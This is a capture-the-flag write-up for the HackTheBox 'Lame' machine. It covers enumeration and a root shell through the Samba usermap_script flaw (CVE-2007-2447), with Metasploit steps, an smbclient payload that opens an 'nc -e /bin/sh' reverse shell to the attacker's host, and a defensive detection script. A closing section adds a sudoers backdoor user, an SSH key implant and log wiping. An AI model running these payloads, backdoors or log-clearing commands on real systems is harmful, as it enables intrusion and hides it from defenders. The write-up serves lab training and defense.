HackTheBox Lame

Writeup for HackTheBox Lame

Machine Synopsis

IP Address: 10.10.10.3

Key Exploitation Techniques:

  • Remote Code Execution (RCE) through a vulnerability in Samba’s usermap script (CVE-2007-2447).
  • Immediate root access upon exploitation.

1. Enumeration

Initial reconnaissance with nmap revealed several open ports related to common network services.

nmap -p- --min-rate 10000 10.10.10.3 -oN nmap_portscan.txt
nmap -p 21,22,139,445 -sC -sV 10.10.10.3 -oN nmap_services.txt

Nmap Results:

  • Port 21 (FTP): vsftpd 2.3.4 with anonymous login enabled.
  • Port 22 (SSH): OpenSSH 4.7p1 Debian.
  • Ports 139 & 445 (SMB/CIFS): Samba smbd 3.0.20-Debian.

The versions of vsftpd and Samba are very old and likely contain known vulnerabilities.


2. Vulnerability Research & Exploitation

Failed Exploit Attempt: vsftpd 2.3.4

A searchsploit lookup for vsftpd 2.3.4 immediately returns a backdoor command execution exploit. We attempted to use the Metasploit module for this vulnerability.

msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

This exploit failed to create a session. This is a common occurrence with older exploits; they may not work as expected or the vulnerability may have been patched in a non-standard way.

Successful Exploit: Samba usermap Script (CVE-2007-2447)

A search for Samba 3.0.20 revealed a critical remote code execution vulnerability related to the usermap script. This vulnerability allows an attacker to execute arbitrary commands as the root user by injecting shell commands into the username field of an SMB login request.

Why it Worked: The username map script hook in this version of Samba does not escape shell metacharacters in the username before passing it to the shell when mapping usernames. By sending a specially crafted username that begins with a forward slash (/) and carries a shell command enclosed in backticks (``), the command is executed with root privileges, since smbd itself runs as root.

We used a Python exploit script that automates this process.

# Attacker Machine: Setup a netcat listener to catch the reverse shell.
nc -nlvp 1234

# Attacker Machine: Execute the Python exploit.
python usermap_script.py 10.10.10.3 445 10.10.14.3 1234

The script successfully sent the payload, which triggered a reverse shell connection to our netcat listener.

connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
# uid=0(root) gid=0(root) groups=0(root)

The id command confirmed we had successfully gained a root shell, bypassing the need for a separate privilege escalation step.


3. Flag Retrieval

With immediate root access, we could now retrieve both the user.txt and root.txt flags.

cd /home/makis
cat user.txt
<redacted>

cd /root
cat root.txt
<redacted>

4. Alternative Exploitation Methods

Method 1: Metasploit

Metasploit has a dedicated module for this vulnerability, which is a simpler and more reliable approach.

msfconsole -q
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
msf6 exploit(multi/samba/usermap_script) > run

Method 2: Manual SMB Client

This technique involves using the built-in smbclient utility to manually trigger the vulnerability. The payload is directly injected into the login command.

# Set up a listener
nc -nlvp 1337

# Execute the command from another terminal
smbclient //10.10.10.3/tmp -c 'logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"'

This method is less verbose and demonstrates a deeper understanding of the vulnerability without relying on pre-built scripts.
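As an added defensive example (not part of the original writeup), the following Python audit flags SMB usernames that carry the "/=" prefix or shell syntax described in the "Why it Worked" section and in the smbclient payload above, and checks whether an smb.conf still enables the `username map script` option (Samba's name for what the writeup calls the usermap script). The sample usernames, the smb.conf fragments and the script path in them are constructed.

```python
import re

# Constructed sample usernames as they might appear in SMB session-setup
# requests (test data, not real captures). The third entry is the writeup's
# own smbclient payload; the rest are benign names or variant injections.
SAMPLE_USERNAMES = [
    "makis",
    "WORKGROUP\\alice",
    "/=`nohup nc -e /bin/sh 10.10.14.3 1337`",
    "/=`id`",
    "bob$(whoami)",
    "WORKGROUP\\srv01$",  # machine account: a trailing '$' is legitimate
]

# Shell syntax that has no place in an account name: backticks, $(...), and
# command separators. A bare '$' is allowed because machine accounts end in one.
SHELL_SYNTAX = re.compile(r"`|\$\(|[;|&]")


def is_suspicious_username(username: str) -> bool:
    """True if the name starts with the '/=' mapping prefix used by the
    CVE-2007-2447 payloads, or carries shell syntax smbd would hand to /bin/sh."""
    return username.startswith("/=") or SHELL_SYNTAX.search(username) is not None


def audit_usernames(usernames):
    """Return the subset of usernames that should raise an alert."""
    return [u for u in usernames if is_suspicious_username(u)]


def smbconf_uses_username_map_script(conf_text: str) -> bool:
    """True if smb.conf sets 'username map script', the option whose handler
    spawns a shell with the client-supplied username (the root cause of the CVE).
    Samba parameter names are case-insensitive and ignore internal whitespace."""
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;" or "=" not in line:
            continue
        key = line.split("=", 1)[0].strip().lower().replace(" ", "")
        if key == "usernamemapscript":
            return True
    return False


# Constructed smb.conf fragments: the exposed setting and a hardened copy without it.
VULNERABLE_SMB_CONF = "[global]\n   workgroup = WORKGROUP\n   username map script = /etc/samba/scripts/mapusers.sh\n"
HARDENED_SMB_CONF = "[global]\n   workgroup = WORKGROUP\n   # username map script removed; use a static 'username map' file instead\n"
```

Running `audit_usernames(SAMPLE_USERNAMES)` returns the three injection strings and leaves the machine account alone; the config check is what to run on a Samba host before trusting that the module above no longer applies.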


5. Post-Exploitation and Defense Evasion

Persistence

  • SSH Key: Install an SSH public key for reliable, passwordless root access.

    mkdir -p /root/.ssh
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8..." >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys

  • Backdoor User: Create a new root-level user.

    useradd -m -s /bin/bash backup
    echo 'backup:password' | chpasswd
    echo 'backup ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers


Defense Evasion

  • Log Cleanup: Clear various system and application logs to remove evidence of the compromise.

    echo > /var/log/auth.log
    echo > /var/log/syslog
    echo > /var/log/samba/log.smbd
    history -c

This post is licensed under CC BY 4.0 by the author.